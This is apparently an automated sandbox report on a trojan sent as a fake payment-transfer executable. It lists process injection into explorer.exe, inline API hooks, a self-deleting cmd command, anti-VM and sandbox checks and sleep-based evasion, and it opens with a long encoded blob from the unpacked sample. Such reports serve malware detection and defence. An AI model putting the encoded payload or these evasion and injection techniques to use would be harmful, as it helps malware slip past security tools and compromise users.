NNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@9/9

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1636:120:WilError_01

Source: unknown

Process created: C:\Windows\SysWOW64\explorer.exe

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Virustotal: Detection: 25%
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
Source:	Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_004178B3 push edi; iretd	4_2_004178B4
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419AD3 push edx; iretd	4_2_00419AD5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00416A8A pushfd ; retf	4_2_00416A90
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00409B8D pushfd ; ret	4_2_00409B90
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00417B8E push edi; ret	4_2_00417B9B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00409B8D pushfd ; ret	4_2_00409B90
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00404443 push 0000007Bh; iretd	4_2_0040444C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0040E42C push ss; iretd	4_2_0040E42D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419DB2 push es; iretd	4_2_00419DBD
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041667E push edx; iretd	4_2_0041668C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041CEB5 push eax; ret	4_2_0041CF08
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041CF6C push eax; ret	4_2_0041CF72
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041CF02 push eax; ret	4_2_0041CF08
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041CF0B push eax; ret	4_2_0041CF72
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0103D0D1 push ecx; ret	4_2_0103D0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C7D0D1 push ecx; ret	9_2_04C7D0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_03099B8D pushfd ; ret	9_2_03099B90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A7B8E push edi; ret	9_2_030A7B9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A6A8A pushfd ; retf	9_2_030A6A90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9AD3 push edx; iretd	9_2_030A9AD5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A78B3 push edi; iretd	9_2_030A78B4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030ACF0B push eax; ret	9_2_030ACF72
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030ACF02 push eax; ret	9_2_030ACF08
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030ACF6C push eax; ret	9_2_030ACF72
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A667E push edx; iretd	9_2_030A668C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030ACEB5 push eax; ret	9_2_030ACF08
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9DB2 push es; iretd	9_2_030A9DBD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_0309E42C push ss; iretd	9_2_0309E42D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_03094443 push 0000007Bh; iretd	9_2_0309444C

Source: initial sample

Static PE information: section name: .text entropy: 7.45974448722

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

File created: \payment transfer copy of $274,876.00 for the invoice shipments.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512, type: MEMORY
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2a94cf8.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000030998E4 second address: 00000000030998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 0000000003099B5E second address: 0000000003099B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Code function: 4_2_00409A90 rdtsc

4_2_00409A90

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6516	Thread sleep time: -99992s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5480	Thread sleep count: 84 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5480	Thread sleep time: -168000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.259257447.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.251785996.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.259520617.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
